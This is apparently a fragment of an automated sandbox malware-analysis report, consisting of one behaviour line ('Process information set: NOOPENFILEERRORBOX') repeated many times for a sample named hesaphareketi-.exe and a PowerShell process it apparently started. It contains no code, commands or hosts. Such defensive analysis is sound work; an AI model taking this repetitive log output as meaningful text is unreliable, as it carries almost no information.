                    Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
